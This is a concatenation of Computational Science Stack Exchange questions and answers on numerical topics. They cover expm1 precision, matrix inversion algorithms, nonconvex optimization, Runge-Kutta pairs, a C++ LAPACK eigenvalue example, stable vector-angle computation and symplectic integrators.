0.0
>>> expm1(x)
1e-22 Exact values are \begin{align}
\exp(10^{-8}) -1 &= 0.000000010000000050000000166666667083333334166666668 \dots \\
\exp(10^{-22})-1 &= 0.000000000000000000000100000000000000000000005000000 \dots
\end{align} In general, an "accurate" implementation of exp and expm1 should have an error of no more than 1 ULP (i.e. one unit in the last place). However, since attaining this accuracy results in "slow" code, sometimes a fast, less accurate implementation is available. For example in CUDA we have expf and expm1f , where f stands for fast. According to the CUDA C programming guide, app. D the expf has an error of 2 ULP. If you do not care about errors on the order of a few ULPs, usually different implementations of the exponential function are equivalent, but beware that bugs may be hidden somewhere... (Remember the Pentium FDIV bug ?) So it is pretty clear that expm1 should be used to compute $\exp(x)-1$ for small $x$ . Using it for general $x$ is not harmful, since expm1 is expected to be accurate over its full range: >>> exp(200)-1 == exp(200) == expm1(200)
True (In the above example $1$ is well below 1 ULP of $\exp(200)$ , so all three expressions return exactly the same floating point number.) A similar discussion holds for the inverse functions log and log1p since $\log(1+x) \approx x$ for $|x| \ll 1$ . | {
"source": [
"https://scicomp.stackexchange.com/questions/20629",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/14933/"
]
} |
22,105 | I am solving differential equations that require to invert dense square matrices. This matrix inversion consumes the most of my computation time, so I was wondering if I am using the fastest algorithm available. My current choice is numpy.linalg.inv . From my numerics I see that it scales as $O(n^3)$ where n is the number of rows, so the method seems to be Gaussian elimination. According to Wikipedia , there are faster algorithms avaliable. Does anyone know if there is a library that implements these? I wonder, why isn't numpy using these faster algorithms? | (This is getting too long for comments...) I'll assume you actually need to compute an inverse in your algorithm. 1 First, it is important to note that these alternative algorithms are not actually claimed to be faster , just that they have better asymptotic complexity (meaning the required number of elementary operations grows more slowly). In fact, in practice these are actually (much) slower than the standard approach (for given $n$), for the following reasons: The $\mathcal{O}$-notation hides a constant in front of the power of $n$, which can be astronomically large -- so large that $C_1 n^3$ can be much smaller than $C_2 n^{2.x}$ for any $n$ that can be handled by any computer in the foreseeable future. (This is the case for the Coppersmith–Winograd algorithm, for example.) The complexity assumes that every (arithmetical) operation takes the same time -- but this is far from true in actual practice: Multiplying a bunch of numbers with the same number is much faster than multiplying the same amount of different numbers. This is due to the fact that the major bottle-neck in current computing is getting the data into cache, not the actual arithmetical operations on that data. So an algorithm which can be rearranged to have the first situation (called cache-aware ) will be much faster than one where this is not possible. (This is the case for the Strassen algorithm, for example.) Also, numerical stability is at least as important as performance; and here, again, the standard approach usually wins. For this reason, the standard high-performance libraries (BLAS/LAPACK, which Numpy calls when you ask it to compute an inverse) usually only implement this approach. Of course, there are Numpy implementations of, e.g., Strassen's algorithm out there, but an $\mathcal{O}(n^3)$ algorithm hand-tuned at assembly level will soundly beat an $\mathcal{O}(n^{2.x})$ algorithm written in a high-level language for any reasonable matrix size. 1 But I'd be amiss if I didn't point out that this is very rarely really necessary: anytime you need to compute a product $A^{-1}b$, you should instead solve the linear system $Ax=b$ (e.g., using numpy.linalg.solve ) and use $x$ instead -- this is much more stable, and can be done (depending on the structure of the matrix $A$) much faster. If you need to use $A^{-1}$ multiple times, you can precompute a factorization of $A$ (which is usually the most expensive part of the solve) and reuse that later. | {
"source": [
"https://scicomp.stackexchange.com/questions/22105",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/8329/"
]
} |
23,948 | I was very surprised when I started to read something about non-convex optimization in general and I saw statements like this: Many practical problems of importance are non-convex, and most
non-convex problems are hard (if not impossible) to solve exactly in a
reasonable time. ( source ) or In general it is NP-hard to find a local minimum and many algorithms may get stuck at a saddle point. ( source ) I'm doing kind of non-convex optimization every day - namely relaxation of molecular geometry. I never considered it something tricky, slow and liable to get stuck. In this context, we have clearly many-dimensional non-convex surfaces ( >1000 degrees of freedom ). We use mostly first-order techniques derived from steepest descent and dynamical quenching such as FIRE , which converge in few hundred steps to a local minimum (less than number of DOFs). I expect that with the addition of stochastic noise it must be robust as hell. (Global optimization is a different story) I somehow cannot imagine how the potential energy surface should look like, to make these optimization methods stuck or slowly convergent. E.g. very pathological PES (but not due to non-convexity) is this spiral , yet it is not such a big problem. Can you give illustrative example of pathological non-convex PES? So I don't want to argue with the quotes above. Rather, I have feeling that I'm missing something here. Perhaps the context. | The misunderstanding lies in what constitutes "solving" an optimization problem, e.g. $\arg\min f(x)$. For mathematicians, the problem is only considered "solved" once we have: A candidate solution: A particular choice of the decision variable $x^\star$ and its corresponding objective value $f(x^\star)$, AND A proof of optimality: A mathematical proof that the choice of $x^\star$ is globally optimal, i.e. that $f(x) \ge f(x^\star)$ holds for every choice of $x$. When $f$ is convex, both ingredients are readily obtained. Gradient descent locates a candidate solution $x^\star$ that makes the gradient vanish $\nabla f(x^\star)=0$. The proof of optimality follows from a simple fact taught in MATH101 that, if $f$ is convex, and its gradient $\nabla f$ vanishes at $x^\star$, then $x^\star$ is a global solution. When $f$ is nonconvex, a candidate solution may still be easy to find, but the proof of optimality becomes extremely difficult. For example, we may run gradient descent and find a point $\nabla f(x^\star)=0$. But when $f$ is nonconvex, the condition $\nabla f(x)=0$ is necessary but no longer sufficient for global optimality. Indeed, it is not even sufficient for local optimality, i.e. we cannot even guarantee that $x^\star$ is a local minimum based on its gradient information alone. One approach is to enumerate all the points satisfying $\nabla f(x)=0$, and this can be a formidable task even over just one or two dimensions. When mathematicians say that most problems are impossible to solve, they are really saying that the proof of (even local) optimality is impossible to construct . But in the real world, we are often only interested in computing a "good-enough" solution, and this can be found in an endless number of ways. For many highly nonconvex problems, our intuition tells us that the "good-enough" solutions are actually globally optimal, even if we are completely unable to prove it! | {
"source": [
"https://scicomp.stackexchange.com/questions/23948",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4696/"
]
} |
24,998 | I simply want to know whether the Dormand-Prince Numerical Method or the Cash-Karp Numerical Method is more accurate. | Since I just finished optimizing a lot of them in software, DifferentialEquations.jl , I decided to just lay out a comparison of the main Order 4/5 methods. The Fehlberg method was left out because it's commonly known to be less efficient than the DP5 method. Backstories Dormand-Prince 4/5 The Dormand-Prince method was developed to be accurate as a 4/5 pair with local extrapolation usage (i.e. step with the order 5 pair. This is because it was designed to be close to optimal (i.e. minimal) principle truncation error coefficient (under the restraint of also having the minimal number of steps to achieve order 5). It has an order 4 interpolation which is free but needs extra steps for an order 5 interpolation. Cash-Karp 4/5 The Cash-Karp method was developed to satisfy different constraints, namely to deal with non-smooth problems better. They chose the $c_i$ , the percentage of the timestep in the $i$ th step (i.e. $t+c_i \Delta t$ is the time the $i$ th step is calculated at) to be as uniform as possible, yet still achieve order 5. Then it also was derived to have embedded 1st, 2nd, 3rd, and 4th order methods with this uniformity of the $c_i$ . They are spaced in such a manner that you can find out where a stiff part starts by which difference is large. Moreover, note that the more stiff the equation, the worse a higher order method does (because it needs bounds on higher derivatives). So they develop a strategy that uses the 5 embedded methods to "quit early": i.e. if you detect stiffness, stop at stage $i<6$ to decrease the number of function calls and save time. So in the end, this "pair" was developed with a lot of other constraints in mind, and so there's no reason to expect it would be "more accurate", at least as a 4/5 pair. If you add all of this other machinery then, on (semi-)stiff problems, it will be more accurate (but in that case you may want to use a different method like a W-Rosenbrock method). This is one reason why this pair hasn't become standard over the DP5 pair, but it still can be useful (maybe it would be good for a hybrid method that switches to a stiff solver when stiffness is encountered?). Bogacki & Shampine 4/5 To round out the answer, let's discuss the Bogacki & Shampine pair that was mentioned in the comment. The BS5 method drops the constraint of "using the least function calls" (it uses 8 instead of 6) in order to do 2 things: Get really low principle truncation error coefficients. Produce an order 5 interpolation with lower error coefficients. These coefficients are so low that for many problems with tolerances that users likely use, it measures as though it's 6th order. Their paper shows that for cheap function calls, this can be more efficient than DP5 by about the same amount as DP5 was over RKF5 (the Fehlberg method). You might put two-and-two together and see: wait a second, Shampine is the same person who developed the MATLAB ODE suite, this was after the BS5 pair paper was published, why doesn't MATLAB's ode45 use the BS5 pair? One reason is, it was mostly done before the BS5 pair was released. The other reason is that the ode45 function was developed to minimize time. While the BS5 pair is more efficient (i.e. gets lower accuracy), the purpose of ode45 is to have a good enough error to make a good enough plot. 
This means that, in order to deal with the large steps, it also produces two extra interpolated solutions between every step. For the DP5 method, there is a "free" order 4 interpolation, and so this is much faster than using BS5. Since it is also "accurate enough" at moderate tolerances, this method is set as the standard because it gives a better standard user experience than BS5 when doing interactive computing (so this choice was context-specific). Tsitouras 4/5 Here's one fewer people know about. It's derived in this paper . It's derived using fewer assumptions than the DP5 method and tries to get a pair with lower principle truncation error coefficients. In its tests, it states that it achieves this. It also has a free order 4 interpolation like the DP5 method. Numerical tests I wrote the numerical package DifferentialEquations.jl to be a pretty comprehensive set of solvers for Julia. Along the warpath, I implemented over 100 Runge-Kutta methods, and hand-optimized plenty. Three of the hand-optimized integrators are the DP5, BS5, and Tsit5 methods (I did not do CK5 because, as noted in the backstory, its main case is for problems that are kind of stiff. I think the better way to handle them is to use DP5/BS5 and switch to stiff solvers as necessary in a manner like LSODE, but that's a story for a different time) (one way to see they are close to optimal is that these methods are faster than the Hairer dopri5 implementations, so they are at least decent implementations). Tests between a lot of Runge-Kutta methods on nonstiff equations can be found on this benchmarks page . I am adding more as I go along, but you can see from the linear ODE and the Three-Body problem work precision diagrams, I measure the DP5 and Tsit5 methods to have almost identical efficiency, beating out the BS5 method in the linear ODE, while it's DP5 and BS5 that are almost identical on the Three-Body problem with Tsit5 behind. From this information, at least for now, I have settled on the DP5 method as the default, matching previous recommendations. That may change with future tests (or you could add benchmarks! Feel free to contribute, or Star the repo to give this effort more support). Conclusion In conclusion, the Order 5 pairs go like this: The Dormand-Prince 4/5 pair is a good go-to pair since it's well-optimized in terms of principle truncation error coefficient and has a cheap order 4 interpolation, which makes it fast for producing decent plots. The Cash-Karp pair has more constraints on it to better handle stiff equations. However, to get the full benefit you'll want to use the full algorithm with the 5 embedded methods. Bogacki & Shampine Order 5 method may be the most efficient in terms of producing error per function calls (it has a double error estimator, so in harder problems, it probably does better), but that allows it to take larger timesteps. However, if you just want to produce a smooth plot, you then have to counter-act this method: use a lower tolerance (so it will take longer than DP5 but with less error) or use more interpolated steps. In the end, this meant that it might not be better for interactive applications, although it might be better for some scientific computing applications. The Tsitouras 4/5. Was developed fairly recently (2011) to beat out the DP5 in a head-to-head comparison. My tests don't give me a reason to believe that it's so much better than DP5 that it should now be considered the new standard method, but future tests may begin to side in its favor. 
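(Aside, purely to illustrate the kind of work–precision check described above: SciPy's solve_ivp is not one of the packages benchmarked here, but it exposes the Dormand–Prince 5(4) pair as "RK45" and Hairer's 8th-order Dormand–Prince code as "DOP853", so a crude comparison can be sketched in a few lines. The test problem, tolerances, and output format below are my own arbitrary choices, and a reasonably recent SciPy is assumed.)
import numpy as np
from scipy.integrate import solve_ivp
def f(t, y):
    return -y  # simple test problem y' = -y with exact solution exp(-t)
for method in ("RK45", "DOP853"):  # RK45 is the Dormand-Prince 5(4) pair
    for rtol in (1e-3, 1e-6, 1e-9):
        sol = solve_ivp(f, (0.0, 10.0), [1.0], method=method, rtol=rtol, atol=1e-12)
        err = abs(sol.y[0, -1] - np.exp(-10.0))
        print(f"{method:7s} rtol={rtol:.0e} nfev={sol.nfev:5d} err={err:.2e}")
Sweeping the tolerance and plotting err against sol.nfev gives a miniature work–precision diagram of the sort used in the benchmarks above.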
Edit I did improve the Tsit5 implementation. It now does better than DP5 on most tests, both the DifferentialEquations.jl and the Hairer dopri implementations (though one might be surprised that the DifferentialEquations.jl implementations are actually faster, which of course helps the Tsit5 implementation). I now recommend it as the default order 4/5 method. | {
"source": [
"https://scicomp.stackexchange.com/questions/24998",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/21712/"
]
} |
25,581 | I was just curious as to why high-order (i.e. greater than 4) Runge–Kutta methods are almost never discussed/employed (at least to my knowledge). I understand it requires greater computational time per step (e.g. RK14 with 12th-order embedded step ), but are there any other downsides of using higher order Runge–Kutta methods (e.g. stability issues)? When applied to equations with highly oscillating solutions on extreme time scales, wouldn't such higher-order methods be typically preferred? | There are thousands of papers and hundreds of codes out there using Runge-Kutta methods of fifth order or higher. Note that the most commonly used explicit integrator in MATLAB is ODE45, which advances the solution using a 5th-order Runge-Kutta method. Examples of widely-used high-order Runge-Kutta methods The paper of Dormand & Prince giving a 5th-order method has over 1700 citations according to Google Scholar . Most of those are papers using their method to solve some problem. The Cash-Karp method paper has over 400 citations . Perhaps the most widely-used method of order higher than 5 is the 8th-order method of Prince-Dormand which has over 400 citations on Google Scholar . I could give many other examples; and keep in mind that many (if not most) of the people using these methods never cite the papers. Note also that high-order extrapolation and deferred correction methods are Runge-Kutta methods . High-order methods and rounding error If your accuracy is limited by rounding errors then you should use a higher-order method . This is because higher-order methods require fewer steps (and fewer function evaluations, even though there are more evaluations per step), so they commit fewer rounding errors. You can easily verify this yourself with simple experiments; it is a good homework problem for a first course in numerical analysis. Tenth-order methods are extremely useful in double-precision arithmetic. On the contrary, if all we had was Euler's method, then rounding error would be a major issue and we would need very high-precision floating point numbers for many problems where high-order solvers do just fine. High order methods can be just as stable @RichardZhang has referenced the second Dahlquist barrier, but that applies only to multistep methods. The question posted here is about Runge-Kutta methods, and there are Runge-Kutta methods of every order that are not only $A$ -stable, but also $B$ -stable (a stability property useful for some nonlinear problems). To learn about these methods, see for instance the text of Hairer & Wanner. High-order methods in celestial mechanics You ask When applied to equations with highly oscillating solutions on extreme time scales, wouldn't such higher-order methods be typically preferred? You're exactly right! A prime example of this is celestial mechanics. I'm not an expert in that area. But this paper , for instance, compares methods for celestial mechanics and doesn't even consider order lower than 5. It concludes that methods of order 11 or 12 are often the most efficient (with the Prince-Dormand method of order 8 also often very efficient). | {
"source": [
"https://scicomp.stackexchange.com/questions/25581",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/20407/"
]
} |
26,161 | I'm a double major in computer science and mathematics. I love both subjects. I'm thinking of pursuing a graduate career, perhaps in scientific computing. What's the real difference between scientific computing and numerical analysis? Are they studied as careers? | Wikipedia gives a good definition: Numerical analysis is the study of algorithms that use numerical
approximation (as opposed to general symbolic manipulations) for the
problems of mathematical analysis (as distinguished from discrete
mathematics). Numerical analysts are typically interested in proving mathematical results about their algorithms, including error bounds (how large can the error in the approximation be), convergence of iterative schemes (does the approximation approach the correct limit), order and rate of convergence (how fast does the algorithm converge), and computational complexity (bounding the number of operations required by an algorithm.) It's possible to do research in these areas without ever using a computer, and some important results even predate the development of digital computers in the 1950's. Wikipedia also has a definition for "Scientific Computing" Computational science (also scientific computing or scientific
computation (SC)) is a rapidly growing multidisciplinary field that
uses advanced computing capabilities to understand and solve complex
problems. Computational science fuses three distinct elements:[1]
(1) Algorithms (numerical and non-numerical) and modeling and simulation
software developed to solve science (e.g., biological, physical, and
social), engineering, and humanities problems; (2) Computer and information
science that develops and optimizes the advanced system hardware,
software, networking, and data management components needed to solve
computationally demanding problems; and (3) The computing infrastructure that
supports both the science and engineering problem solving and the
developmental computer and information science. Scientific computing is much more about practical aspects of getting accurate solutions out of computers. This obviously builds on the results of numerical analysis, but it also draws heavily on computer architecture and software engineering. Although research in scientific computing is often done for its own sake and to develop hardware and software that will be of use in many applications, there is also a lot of scientific computing research that is driven by the need to solve particular science and engineering problems. For example, the development of global climate models to study climate change has also moved scientific computing forward. Numerical analysis is most commonly found in mathematics and applied mathematics departments, while scientific computing is an interdisciplinary field that can be found in computer science departments, mathematics departments, and in the various engineering and science disciplines. | {
"source": [
"https://scicomp.stackexchange.com/questions/26161",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/23250/"
]
} |
26,258 | Right now I am stuck on a problem. It seems to be a really trivial one, but it is still hard for me to find an appropriate solution. The problem is:
One is given two intervals and has to find their intersection. For instance: Intersection of [0, 3]&[2, 4] is [2, 3] Intersection of [-1, 34]&[0, 4] is [0, 4] Intersection of [0, 3]&[4, 4] is the empty set It is pretty clear that the problem can be solved by testing all possible cases, but that takes a lot of time and is very prone to mistakes. Is there an easier way to tackle the problem? If you know the solution, please help me. I will be very grateful. | We can define a solution to this problem in the following way. Assume the input intervals can be defined as $I_{a} = [a_s, a_e]$ and $I_{b} = [b_s, b_e]$, while the output interval is defined as $I_{o} = [o_s, o_e]$. We can find the intersection $I_{o} = I_{a} \bigcap I_{b}$ by doing the following: if ( $b_s \gt a_e$ or $a_s \gt b_e$ ) { return $\emptyset$ } else { $o_s = \max (a_s,b_s)$ $o_e = \min (a_e,b_e)$ return $[o_s,o_e]$ } | {
"source": [
"https://scicomp.stackexchange.com/questions/26258",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/23387/"
]
} |
26,395 | I'm new to computational science and I already have learned basic methods for integration, interpolation, methods like RK4, Numerov etc on c++ but recently my professor asked me to learn how to use LAPACK for solving problems related to matrices. Like for example finding eigenvalues of a complex matrix. I have never used third-party libraries and I almost always write my own functions. I have been searching around for several days but can't find any amateur-friendly guide to lapack. All of them are written in words I don't understand and I don't know why using already written functions should be this complicated. They are full of words like zgeev, dtrsv, etc. and I'm frustrated. I just want to code something like this pseudo-code: #include <lapack:matrix>
int main(){
LapackComplexMatrix A(n,n);
for...
for...
cin>>A(i,j);
cout<<LapackEigenValues(A);
return 0;
} I don't know if I'm being silly or an amateur. But again, this shouldn't be that hard, should it?
I don't even know whether I should use LAPACK or LAPACK++, or how to install them. (I write code in C++ and have no knowledge of Python or FORTRAN.) | I'm going to disagree with some of the other answers and say that I believe that figuring out how to use LAPACK is important in the field of scientific computing. However, there is a large learning curve to using LAPACK. This is because it is written at a very low level. The disadvantage of that is that it seems very cryptic and not pleasant to the senses. The advantage of it is that the interface is unambiguous and basically never changes. Additionally, implementations of LAPACK, such as the Intel Math Kernel Library, are really fast. For my own purposes, I have my own higher-level C++ classes which wrap around LAPACK subroutines. Many scientific libraries also use LAPACK underneath. Sometimes it's easier to just use them, but in my opinion there's a lot of value in understanding the tool underneath. To that end, I've provided a small working example written in C++ using LAPACK to get you started. This works in Ubuntu, with the liblapack3 package installed, and other necessary packages for building. It can probably be used in most Linux distributions, but installation of LAPACK and linking against it can vary. Here's the file test_lapack.cpp #include <iostream>
#include <fstream>
using namespace std;
// dgeev_ is a symbol in the LAPACK library files
extern "C" {
extern int dgeev_(char*,char*,int*,double*,int*,double*, double*, double*, int*, double*, int*, double*, int*, int*);
}
int main(int argc, char** argv){
// check for an argument
if (argc<2){
cout << "Usage: " << argv[0] << " " << " filename" << endl;
return -1;
}
int n,m;
double *data;
// read in a text file that contains a real matrix stored in column major format
// but read it into row major format
ifstream fin(argv[1]);
if (!fin.is_open()){
cout << "Failed to open " << argv[1] << endl;
return -1;
}
fin >> n >> m; // n is the number of rows, m the number of columns
data = new double[n*m];
for (int i=0;i<n;i++){
for (int j=0;j<m;j++){
fin >> data[j*n+i];
}
}
if (fin.fail() || fin.eof()){
cout << "Error while reading " << argv[1] << endl;
return -1;
}
fin.close();
// check that matrix is square
if (n != m){
cout << "Matrix is not square" <<endl;
return -1;
}
// allocate data
char Nchar='N';
double *eigReal=new double[n];
double *eigImag=new double[n];
double *vl,*vr;
int one=1;
int lwork=6*n;
double *work=new double[lwork];
int info;
// calculate eigenvalues using the DGEEV subroutine
dgeev_(&Nchar,&Nchar,&n,data,&n,eigReal,eigImag,
vl,&one,vr,&one,
work,&lwork,&info);
// check for errors
if (info!=0){
cout << "Error: dgeev returned error code " << info << endl;
return -1;
}
// output eigenvalues to stdout
cout << "--- Eigenvalues ---" << endl;
for (int i=0;i<n;i++){
cout << "( " << eigReal[i] << " , " << eigImag[i] << " )\n";
}
cout << endl;
// deallocate
delete [] data;
delete [] eigReal;
delete [] eigImag;
delete [] work;
return 0;
} This can be built using the command line g++ -o test_lapack test_lapack.cpp -llapack This will produce an executable named test_lapack . I've set this up to read in a text input file. Here's a file named matrix.txt containing a 3x3 matrix. 3 3
-1.0 -8.0 0.0
-1.0 1.0 -5.0
3.0 0.0 2.0 To run the program simply type ./test_lapack matrix.txt at the command line, and the output should be --- Eigenvalues ---
( 6.15484 , 0 )
( -2.07742 , 3.50095 )
( -2.07742 , -3.50095 ) Comments: You seem thrown off by the naming scheme for LAPACK. A short description is here . The interface for the DGEEV subroutine is here . You should be able to compare the description of the arguments there to what I've done here. Note the extern "C" section at the top, and that I've added an underscore to dgeev_ . That's because the library was written and built in Fortran, so this is necessary to make the symbols match when linking. This is compiler and system dependent, so if you use this on Windows, it will all have to change. Some people might suggest using the C interface to LAPACK . They might be right, but I've always done it this way. | {
"source": [
"https://scicomp.stackexchange.com/questions/26395",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/23599/"
]
} |
27,689 | When applying the classical formula for the angle between two vectors: $$\alpha = \arccos \frac{\mathbf{v_1} \cdot \mathbf{v_2}}{\|\mathbf{v_1}\| \|\mathbf{v_2}\|}$$ one finds that, for very small/acute angles, there is a loss of precision and the result is not accurate. As explained in this Stack Overflow answer , one solution is to use the arctangent instead: $$\alpha = \arctan2 \left(\|\mathbf{v_1} \times \mathbf{v_2}\|, \mathbf{v_1} \cdot \mathbf{v_2} \right) $$ And this indeed gives better results. However, I wonder if this would give bad results for angles very close to $\pi / 2$. Is it the case? If so, is there any formula to accurately compute angles without checking for a tolerance inside an if branch? | ( I have tested this approach before, and I remember it worked correctly, but I haven't tested it specifically for this question. ) As far as I can tell, both $\|\mathbf{v}_1\times \mathbf{v}_2\|$ and $\mathbf{v}_1\cdot \mathbf{v}_2$ can suffer from catastrophic cancellation if they are almost parallel/perpendicular—atan2 can't give you good accuracy if either input is off. Start by reformulating the problem as finding the angle of a triangle with side lengths $a=|\mathbf{v}_1|$, $b=|\mathbf{v}_2|$ and $c=|\mathbf{v}_1-\mathbf{v}_2|$ (these are all accurately computed in floating point arithmetic). There is a well-known variant of Heron's formula due to Kahan ( Miscalculating Area and Angles of a Needle-like Triangle ), which allows you to compute the area and angle (between $a$ and $b$) of a triangle specified by its side lengths, and do so numerically stably. Because the reduction to this subproblem is accurate as well, this approach should work for arbitrary inputs. Quoting from that paper (see p.3), assuming $a\geq b$,
$$ \mu = \begin{cases}
c-(a-b),&\text{if }b\geq c\geq 0,\\
b-(a-c),&\text{if }c>b\geq 0,\\
\text{invalid triangle},&\text{otherwise}
\end{cases}$$
$$
\mathrm{angle} = 2\arctan\left(
\sqrt{\frac{((a-b)+c)\mu}{(a+(b+c))((a-c)+b)}}
\right)$$
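A direct Python/NumPy transcription of the two formulas above might look like the following sketch (my own code, not taken from Kahan's paper; the function name and the use of NumPy are arbitrary choices, and no special handling of zero-length inputs is attempted):
import numpy as np
def angle_between(v1, v2):
    # Kahan's needle-safe triangle formula: the angle between v1 and v2 equals the
    # angle of the triangle with side lengths |v1|, |v2| and |v1 - v2|.
    v1 = np.asarray(v1, dtype=float)
    v2 = np.asarray(v2, dtype=float)
    a, b, c = np.linalg.norm(v1), np.linalg.norm(v2), np.linalg.norm(v1 - v2)
    if b > a:
        a, b = b, a  # enforce a >= b
    if b >= c >= 0.0:
        mu = c - (a - b)
    elif c > b >= 0.0:
        mu = b - (a - c)
    else:
        raise ValueError("invalid triangle; check the inputs")
    return 2.0 * np.arctan(np.sqrt(((a - b) + c) * mu / ((a + (b + c)) * ((a - c) + b))))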
All the parentheses here are placed carefully, and they matter; if you find yourself taking the square root of a negative number, the input side lengths are not the side lengths of a triangle. There is an explanation of how this works, including examples of values for which other formulas fail, in Kahan's paper. Your first formula for $\alpha$ is $C''$ on page 4. The main reason I suggest Kahan's Heron's formula is because it makes a very nice primitive—lots of potentially tricky planar geometry questions can be reduced to finding the area/angle of an arbitrary triangle, so if you can reduce your problem to that, there is a nice stable formula for it, and there's no need to come up with something on your own. Edit Following Stefano's comment, I made a plot of relative error for $v_1=(1,0)$, $v_2=(\cos\theta, \sin\theta)$ ( code ). The two lines are the relative errors for $\theta=\epsilon$ and $\theta=\pi/2-\epsilon$, $\epsilon$ going along the horizontal axis. It seems that it works. | {
"source": [
"https://scicomp.stackexchange.com/questions/27689",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/782/"
]
} |
29,149 | In this comment I wrote: ...default SciPy integrator, which I'm assuming only uses symplectic methods. in which I am referring to SciPy's odeint , which uses either a "non-stiff (Adams) method" or a "stiff (BDF) method". According to the source : def odeint(func, y0, t, args=(), Dfun=None, col_deriv=0, full_output=0,
ml=None, mu=None, rtol=None, atol=None, tcrit=None, h0=0.0,
hmax=0.0, hmin=0.0, ixpr=0, mxstep=0, mxhnil=0, mxordn=12,
mxords=5, printmessg=0):
"""
Integrate a system of ordinary differential equations.
Solve a system of ordinary differential equations using lsoda from the
FORTRAN library odepack.
Solves the initial value problem for stiff or non-stiff systems
of first order ode-s::
dy/dt = func(y, t0, ...)
where y can be a vector.
""" Here is an example where I propagate a satellite's orbit around the earth for three months just to show that it precesses as expected. I believe that non-symplectic integrators have the undesirable property that they will tend not to conserve energy (or other quantities) and so are undesirable in orbital mechanics for example. But I'm not exactly sure what it is that makes a symplectic integrator symplectic. Is it possible to explain what the property is (that makes a symplectic integrator symplectic) in a straightforward and (fairly) easy to understand but not inaccurate way? I'm asking from the point of view of how the integrator functions internally , rather than how it performs in testing. And is my suspicion correct that odeint does use only symplectic integrators? | Let me start off with corrections. No, odeint doesn't have any symplectic integrators. No, symplectic integration doesn't mean conservation of energy. What does symplectic mean and when should you use it? First of all, what does symplectic mean? Symplectic means that the solution exists on a symplectic manifold. A symplectic manifold is a solution set which is defined by a 2-form. The details of symplectic manifolds probably sound like mathematical nonsense, so instead the gist of it is there is a direct relation between two sets of variables on such a manifold. The reason why this is important for physics is because Hamiltonian's equations naturally have that the solutions reside on a symplectic manifold in phase space, with the natural splitting being the position and momentum components. For the true Hamiltonian solution, that phase space path is constant energy. A symplectic integrator is an integrator whose solution resides on a symplectic manifold. Because of discretization error, when it is solving a Hamiltonian system it doesn't get exactly the correct trajectory on the manifold. Instead, that trajectory itself is perturbed $\mathcal{O}(\Delta t^n)$ for the order $n$ from the true trajectory. Then there's a linear drift due to numerical error of this trajectory over time. Normal integrators tend to have a quadratic (or more) drift, and do not have any good global guarantees about this phase space path (just local). What this tends to mean is that symplectic integrators tend to capture the long-time patterns better than normal integrators because of this lack of drift and this almost guarantee of periodicity. This notebook displays those properties well on the Kepler problem . The first image shows what I'm talking about with the periodic nature of the solution. This was solved using the 6th order symplectic integrator from Kahan and Li from DifferentialEquations.jl . You can see that the energy isn't exactly conserved, but its variation is dependent on how far the perturbed solution manifold is from the true manifold. But since the numerical solution itself resides on a symplectic manifold, it tends to be almost exactly periodic (with some linear numerical drift that you can see), making it do very nicely for long term integration. If you do the same with RK4, you can get disaster: You can see that the issue is that there's no true periodicity in the numerical solution and therefore overtime it tends to drift. This highlights the true reason to choose symplectic integrators: symplectic integrators are good on long-time integrations on problems that have the symplectic property (Hamiltonian systems) . So let's walk through a few things. 
Note that you don't always need symplectic integrators even on a symplectic problem. For this case, an adaptive 5th order Runge-Kutta method can do fine. Here's Tsit5 : Notice two things. One, it gets a good enough accuracy that you cannot see the actual drift in the phase space plot. However, on the right side you can see that there is this energy drift, and so if you are doing a long enough integration this method will not do as well as the solution method with the periodic properties. But that raises the question, how does it fare efficiency-wise vs just integrating extremely accurately? Well, this is a bit less certain. In SciMLBenchmarks.jl you can find some benchmarks investigating this question. For example, this notebook looks at the energy error vs runtime on a Hamiltonian equation system from a quadruple Boson model and shows that if you want really high accuracy, then even for quite long integration times it's more efficient to just use a high order RK or Runge-Kutta Nystrom (RKN) method. This makes sense because to satisfy the symplectic property the integrators give up some efficiency and pretty much have to be fixed time step (there is some research making headway into the latter but it's not very far along). In addition, notice from both of these notebooks that you can also just take a standard method and project it back to the solution manifold each step (or every few steps). This is what the examples using the DifferentialEquations.jl ManifoldProjection callback are doing. You see that guarantees conservation laws are upheld but with an added cost of solving an implicit system each step. You can also use a fully-implicit ODE solver or singular mass matrices to add on conservation equations, but the end result is that these methods are more computationally-costly as a tradeoff. So to summarize, the class of problems where you want to reach for a symplectic integrator are those that have a solution on a symplectic manifold (Hamiltonian systems) where you don't want to invest the computational resources to have a very exact (tolerance <1e-12 ) solution and don't need exact energy/etc. conservation. This highlights that it's all about long-term integration properties, so you shouldn't just flock to them all willy-nilly like some of the literature suggests. But they are still a very important tool in many fields like Astrophysics where you do have long time integrations that you need to solve sufficiently fast without having absurd accuracy. Where do I find symplectic integrators? What kind of symplectic integrators exist? There are generally two classes of symplectic integrators. There are the symplectic Runge-Kutta integrators (which are the ones shown in the above examples) and there are implicit Runge-Kutta methods which have the symplectic property. As @origimbo mentions, the symplectic Runge-Kutta integrators require that you provide them with a partitioned structure so they can handle the position and momentum parts separately. However, counter to the comment, the implicit Runge-Kutta methods are symplectic without requiring this, but instead require solving a nonlinear system. This isn't too bad because if the system is non-stiff this nonlinear system can be solved with functional iteration or Anderson acceleration, but the symplectic RK methods should still probably be preferred for efficiency (it's a general rule that the more information you provide to an integrator, the more efficient it is). 
